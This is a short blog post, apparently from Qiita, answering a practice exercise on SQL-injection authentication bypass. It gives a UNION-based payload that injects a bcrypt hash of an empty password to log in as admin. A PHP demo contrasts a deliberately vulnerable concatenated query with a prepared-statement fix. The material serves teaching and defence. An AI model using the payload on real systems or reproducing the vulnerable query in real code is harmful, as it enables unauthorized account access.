Thinking through a practice problem on bypassing authentication with SQL injection

Posted at 2023-09-17

https://qiita.com/ockeghem/items/787f74801a24e1fc6960
My answer to the practice problem in the article above

UserID : ' union select '' as id, 'admin' as userid, '$2y$10$Ur8VTGkSgaF808C4krzvhOsLLxDzgHxhrVms6aUsnaLxmay3DV/ra' as password, '' as email; -- '
Password : (leave empty)

The hash value placed in the password column was obtained locally with password_hash('', PASSWORD_BCRYPT); any combination for which password_verify() returns true would work just as well.
It is joined via UNION together with a userid column set to admin.

As a result, the SQL executed inside login.php becomes

SELECT * FROM users WHERE userid = '' union select '' as id, 'admin' as userid, '$2y$10$Ur8VTGkSgaF808C4krzvhOsLLxDzgHxhrVms6aUsnaLxmay3DV/ra' as password, '' as email; -- ''

which returns a record whose userid is admin and for which a login with an empty-string password succeeds.
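
An added example (not code from the original article or from the exercise it answers): the same UserID input handled by a concatenated query and by a prepared statement, so the difference in where the verified hash comes from is visible. The in-memory SQLite database, the table layout, the stored admin password, and the function names login_vulnerable and login_hardened are assumptions made for illustration.

```php
<?php
// Added example. Constructed schema and data on an in-memory SQLite database (assumption);
// column order follows the article's UNION: id, userid, password, email.
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE users (id INTEGER PRIMARY KEY, userid TEXT, password TEXT, email TEXT)');
$ins = $pdo->prepare('INSERT INTO users (userid, password, email) VALUES (?, ?, ?)');
$ins->execute(['admin', password_hash('constructed-admin-password', PASSWORD_BCRYPT), 'admin@example.com']);

// Hypothetical stand-in for the vulnerable login.php: the userid is concatenated
// into the SQL text, so the row (and the hash checked below) can come from the input.
function login_vulnerable(PDO $pdo, string $userid, string $password): ?string
{
    $sql = "SELECT * FROM users WHERE userid = '$userid'";
    $row = $pdo->query($sql)->fetch(PDO::FETCH_ASSOC);
    if ($row !== false && password_verify($password, $row['password'])) {
        return $row['userid'];
    }
    return null;
}

// Hardened form: the userid is bound as a parameter, so the whole input is compared
// as a literal value and the hash can only come from a row stored in users.
function login_hardened(PDO $pdo, string $userid, string $password): ?string
{
    $stmt = $pdo->prepare('SELECT userid, password FROM users WHERE userid = ?');
    $stmt->execute([$userid]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    if ($row !== false && password_verify($password, $row['password'])) {
        return $row['userid'];
    }
    return null;
}

// The UserID value from the article, with the hash regenerated locally the way
// the article describes: password_hash('', PASSWORD_BCRYPT).
$hash   = password_hash('', PASSWORD_BCRYPT);
$userid = "' union select '' as id, 'admin' as userid, '$hash' as password, '' as email; -- ";

// Same input and empty password against both implementations.
var_dump(login_vulnerable($pdo, $userid, ''));
var_dump(login_hardened($pdo, $userid, ''));
```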
